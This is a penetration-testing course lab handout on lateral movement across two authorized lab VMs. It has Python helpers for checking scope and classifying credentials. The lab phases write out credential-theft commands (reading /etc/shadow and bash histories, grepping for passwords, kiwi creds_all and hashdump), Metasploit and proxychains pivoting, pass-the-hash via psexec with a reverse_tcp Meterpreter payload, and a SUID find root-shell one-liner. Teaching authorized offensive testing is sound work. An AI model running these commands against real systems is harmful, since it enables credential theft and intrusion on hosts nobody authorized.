Lab 10: Lateral Movement and Multi-Host Engagement Transcript

Week 10 graded lab. Multi-host engagement against the instructor-provided lab range. Kill-chain documentation required.


Learning objectives

  • Use credentials captured on Host A to authenticate to Host B (credential reuse / pass-the-hash)
  • Pivot through a compromised host to reach a second network segment (if the lab includes one)
  • Maintain scope discipline: confirm every new target IP is in the authorized range before connecting
  • Produce a multi-host engagement transcript suitable for use in the capstone report format

Authorization

Authorized range: The instructor-assigned lab network. Both Host A (Metasploitable 2) and Host B (second lab VM) are in this range. The exact IPs are provided at lab start.

Before you begin: Write the authorized range in your session log. Before each new connection attempt, note the target IP and confirm it is in the range.

Scope discipline is graded. If you encounter an IP outside the stated range during this lab (from pivoting or credential spray results), stop, document the excursion with a timestamp, and notify the instructor before continuing.
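The scope check described above, written out as a small Python helper. This is an added example for the lab, not instructor-provided code: the range 192.168.56.0/24 and the IPs in the demo are constructed placeholders that you replace with the instructor-assigned values. It answers "is this IP in the authorized range?" before any connection, produces the timestamped log line the session log needs, flags excursions in a list of discovered hosts, and generates the text for the scope compliance statement in the deliverable from the list of targets actually contacted.

```python
"""Scope gate for the lab range: every target IP is checked against the
authorized range before a connection is attempted, and the decision is
written out as a timestamped session-log line. Added example; the range
and IPs below are constructed placeholders, not the instructor's values."""
import ipaddress
from datetime import datetime, timezone

# Constructed placeholder: the real authorized range is given at lab start.
AUTHORIZED_RANGES = ["192.168.56.0/24"]


def parse_ranges(ranges):
    """Turn CIDR strings into network objects (strict=False tolerates host bits)."""
    return [ipaddress.ip_network(r, strict=False) for r in ranges]


def in_scope(target, ranges=AUTHORIZED_RANGES):
    """True only if target is a valid IP inside one of the authorized networks.
    Anything unparsable (a hostname, a typo) is treated as out of scope, so a
    bad string can never slip through as 'allowed'."""
    try:
        addr = ipaddress.ip_address(target)
    except ValueError:
        return False
    return any(addr in net for net in parse_ranges(ranges))


def gate(target, ranges=AUTHORIZED_RANGES, log=None):
    """Check one target and record the decision. Returns (allowed, log_line).
    An out-of-scope verdict means: do not connect, note the excursion, notify
    the instructor before continuing."""
    allowed = in_scope(target, ranges)
    stamp = datetime.now(timezone.utc).isoformat(timespec="seconds")
    verdict = "IN-SCOPE" if allowed else "OUT-OF-SCOPE stop-and-notify"
    line = f"{stamp} scope-check target={target} {verdict}"
    if log is not None:
        log.append(line)
    return allowed, line


def excursions(targets, ranges=AUTHORIZED_RANGES):
    """Every address in a list (e.g. hosts returned by a pivot scan) that is
    outside the authorized range, in the order first seen, without duplicates."""
    seen, out = set(), []
    for t in targets:
        if t not in seen and not in_scope(t, ranges):
            seen.add(t)
            out.append(t)
    return out


def compliance_statement(targets, ranges=AUTHORIZED_RANGES):
    """Text for the deliverable's scope-compliance section, derived from the
    list of every target contacted during the session."""
    bad = excursions(targets, ranges)
    if not bad:
        return (f"All connections were within the authorized range {', '.join(ranges)}.\n"
                "No connections were made to addresses outside this range.")
    return (f"Out-of-scope addresses were encountered: {', '.join(bad)}. "
            "Each was recorded with a timestamp and reported to the instructor.")


if __name__ == "__main__":
    session_log = []
    # Constructed demo targets: two in range, one outside it.
    for ip in ["192.168.56.20", "192.168.56.30", "10.0.0.5"]:
        _, entry = gate(ip, log=session_log)
        print(entry)
    print(compliance_statement(["192.168.56.20", "192.168.56.30"]))
```

Run it inside the `script -a` session so the printed verdict lines land in session.log automatically; an unparsable target deliberately counts as out of scope, so a hostname or mistyped address is refused rather than silently allowed.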


Setup

# Start session logging:
mkdir -p ~/pen101-workspace/lab-10
script -a ~/pen101-workspace/lab-10/session.log

# Record the authorized range (keep the header next to session.log):
echo "Authorized range: <instructor-assigned-range>" >> ~/pen101-workspace/lab-10/session-header.txt
echo "Host A IP: <metasploitable2-ip>" >> ~/pen101-workspace/lab-10/session-header.txt
echo "Host B IP: <second-host-ip>" >> ~/pen101-workspace/lab-10/session-header.txt

Phase 1: Establish foothold on Host A

Use any technique from Labs 7-9. The goal is a Meterpreter session (or equivalent) on Host A.

Required post-exploitation actions before proceeding:

# In your shell or Meterpreter session:
id  # or getuid in Meterpreter
hostname
ifconfig  # or ipconfig on Windows; ip addr on Linux
# IMPORTANT: note ALL network interfaces, not just the primary one

Credential extraction from Host A:

Linux (Metasploitable 2):

# From root shell:
cat /etc/shadow            # password hashes for all local users
cat /home/*/.bash_history  # credentials in command history
find /home /root -type f \( -name "*.conf" -o -name "*.cfg" -o -name ".env" \) -print0 2>/dev/null | xargs -0 grep -l "password\|pass\|secret" 2>/dev/null

Windows (from Meterpreter SYSTEM session):

meterpreter > load kiwi
meterpreter > creds_all   # dump NTLM hashes + plaintext if WDigest
meterpreter > hashdump    # SAM database NTLM hashes

Document: What credential material did you extract? For each entry, list the username, the hash type (NT hash from hashdump, or the crypt format of the /etc/shadow field, e.g. MD5-crypt) and any plaintext credentials found in config files or history.
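To produce the inventory the Document step asks for, here is an added Python example (not lab or tool code) that parses /etc/shadow lines and Meterpreter hashdump lines and records, per user, the hash type and account flags rather than the hash value itself, which is what the report needs and keeps secret material out of the write-up. The sample lines are constructed: the hash bodies are placeholders, except the two well-known empty-string LM and NT values, which are used to flag "LM storage disabled" and "empty password".

```python
"""Credential inventory for the lab report: classify /etc/shadow and
hashdump entries by hash type without copying the hash values.
Added example with constructed sample input."""
import re

# Prefix -> crypt scheme (glibc / libxcrypt conventions).
CRYPT_PREFIXES = {
    "$1$": "MD5-crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "SHA-256-crypt",
    "$6$": "SHA-512-crypt",
    "$7$": "scrypt",
    "$y$": "yescrypt",
}
# Well-known hashes of the empty string; used only as audit flags.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM storage disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # account has an empty password


def classify_crypt(field):
    """Name the scheme of one shadow password field."""
    if field == "":
        return "EMPTY (no password required)"
    if field.startswith(("!", "*")):
        return "locked/no-login"
    for prefix, name in CRYPT_PREFIXES.items():
        if field.startswith(prefix):
            return name
    if re.fullmatch(r"[./0-9A-Za-z]{13}", field):
        return "DES-crypt (legacy)"
    return "unknown"


def parse_shadow(text):
    """/etc/shadow: user:hash:lastchg:min:max:warn:inactive:expire:reserved"""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 2:
            continue
        rows.append({"user": parts[0], "source": "/etc/shadow",
                     "hash_type": classify_crypt(parts[1])})
    return rows


def parse_hashdump(text):
    """Meterpreter hashdump / pwdump format: user:rid:LM-hash:NT-hash:::"""
    rows = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue
        user, rid, lm, nt = parts[:4]
        if not re.fullmatch(r"[0-9a-fA-F]{32}", nt):
            continue  # not a hashdump line
        rows.append({"user": user, "source": "hashdump", "rid": rid,
                     "hash_type": "NT hash",
                     "lm_stored": lm.lower() != EMPTY_LM,
                     "empty_password": nt.lower() == EMPTY_NT})
    return rows


def inventory(shadow_text="", hashdump_text=""):
    """Merged list, sorted by source then user, for the report's credential section."""
    rows = parse_shadow(shadow_text) + parse_hashdump(hashdump_text)
    return sorted(rows, key=lambda r: (r["source"], r["user"]))


def format_report(rows):
    """One text line per entry; no hash values appear in the output."""
    lines = []
    for r in rows:
        flags = [k for k in ("lm_stored", "empty_password") if r.get(k)]
        lines.append(f"{r['user']:<16} {r['source']:<12} {r['hash_type']}"
                     + (f"  [{', '.join(flags)}]" if flags else ""))
    return "\n".join(lines)


# Constructed sample lines (hash bodies are placeholders, not real hashes).
SAMPLE_SHADOW = """\
root:$1$AAAAAAAA$BBBBBBBBBBBBBBBBBBBBBB:14684:0:99999:7:::
msfadmin:$1$CCCCCCCC$DDDDDDDDDDDDDDDDDDDDDD:14684:0:99999:7:::
daemon:*:14684:0:99999:7:::
sync:!:14684:0:99999:7:::
guest::14684:0:99999:7:::
svc:$6$EEEEEEEE$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF:14684:0:99999:7:::
"""
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""

if __name__ == "__main__":
    print(format_report(inventory(SAMPLE_SHADOW, SAMPLE_HASHDUMP)))
```

Paste the real output of `cat /etc/shadow` and `hashdump` into the two sample strings (or read them from files) and keep only `format_report` output in the report; the flags column is where a finding such as an enabled guest account with an empty password shows up.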


Phase 2: Enumerate Host B from Host A

Before moving laterally, enumerate Host B to understand the attack surface.

Option A: Pivot via Metasploit route:

# In Metasploit, with a Meterpreter session on Host A open:
meterpreter > background
msf6 > route add <second-network-range>/<prefix> <session-id>
# or:
msf6 > use post/multi/manage/autoroute
msf6 > set SESSION <session-id>
msf6 > run

# Now scan Host B through the route:
msf6 > use auxiliary/scanner/portscan/tcp
msf6 > set RHOSTS <host-b-ip>
msf6 > set PORTS 21,22,80,135,139,443,445,3306,3389,5985
msf6 > run

Option B: Pivot via SSH local forward (if Host A has SSH):

ssh -L 4455:<host-b-ip>:445 msfadmin@<host-a-ip>
# Now (the forwarded port is passed with --port, not host:port):
# crackmapexec smb 127.0.0.1 --port 4455 -u <username> -p <password>

Option C: Proxychains + Socks proxy:

# In Metasploit:
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVPORT 1080
msf6 > set VERSION 4a
msf6 > run -j

# Edit /etc/proxychains4.conf:
# socks4  127.0.0.1 1080

# Route tools through the proxy:
proxychains nmap -sT -p 22,80,445,3389 <host-b-ip>

Document: What services are open on Host B? Does the tech stack suggest the same OS as Host A?


Phase 3: Lateral movement to Host B

Use the credentials extracted from Host A to authenticate to Host B.

Credential reuse (same password)

If Host A had plaintext credentials in config files or history:

# SSH reuse:
ssh <username>@<host-b-ip>  # try the same password

# SMB reuse:
crackmapexec smb <host-b-ip> -u <username> -p <password>

Pass-the-hash (NTLM hash, Windows targets)

# psexec via Impacket (from Kali if route is set):
proxychains python3 /usr/share/doc/python3-impacket/examples/psexec.py \
    -hashes :<NTLM-hash> Administrator@<host-b-ip>

# Or via Metasploit:
msf6 > use exploit/windows/smb/psexec
msf6 > set RHOSTS <host-b-ip>
msf6 > set SMBUser Administrator
msf6 > set SMBPass <NTLM-hash>
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > run

SSH key reuse

If Host A contained a private key in ~/.ssh/:

# From Kali (after downloading the key from Host A):
ssh -i id_rsa <username>@<host-b-ip>

Proof screenshot: the shell prompt on Host B showing the output of id (or whoami) and hostname. This confirms you have authenticated to a second host using credentials taken from the first.


Phase 4: Post-exploitation on Host B

With a shell on Host B:

# Confirm privilege level:
id && hostname && uname -a  # Linux
# or:
whoami && hostname           # Windows

Transfer and run LinPEAS or WinPEAS on Host B. Save the output.

Identify at least one escalation path in the tool output. Document it in the technique-family table format from Lab 9. You do not need to execute the escalation -- documenting the path is sufficient for this lab.


Phase 5: Kill-chain documentation

Produce the engagement kill-chain as a structured text diagram:

## Engagement Kill Chain

Attacker: Kali Linux, 192.168.x.5 (authorized)
Target: Authorized lab range 192.168.x.0/24

Step 1: Initial access
  Method: vsftpd 2.3.4 backdoor (CVE-2011-2523)
  Target: Host A (192.168.x.20, Metasploitable 2)
  Result: Root shell (uid=0)
  Credential captured: /etc/shadow hash for user msfadmin (MD5-crypt)
                       Config file: /var/www/html/.htpasswd plaintext: admin:password1

Step 2: Lateral movement
  Method: SSH credential reuse (password1 from config file)
  Credential used: msfadmin:password1
  Target: Host B (192.168.x.30)
  Result: Low-privilege shell (uid=1001, msfadmin)

Step 3: Privilege escalation path identified (not executed)
  Host B technique: SUID find binary
  Path: find / -name x -exec /bin/sh \;
  Estimated result: root shell

## Scope compliance note

All connections were within the authorized range 192.168.x.0/24.
No connections were made to addresses outside this range.
No persistence mechanisms were installed.

Deliverable

A Markdown document containing:

  1. Engagement kill-chain diagram (Phase 5 format above)
  2. Per-host notes:
    • Host A: initial foothold method, post-exploitation actions, credentials captured
    • Host B: lateral movement method, credential type used, privilege level achieved, escalation paths identified
  3. Scope compliance statement (written by you; affirms the authorized range was respected)
  4. One-page analysis: what credential reuse paths were found? What is the business impact of an attacker being able to move from Host A to Host B using captured credentials?

Appendix: session.log raw terminal transcript.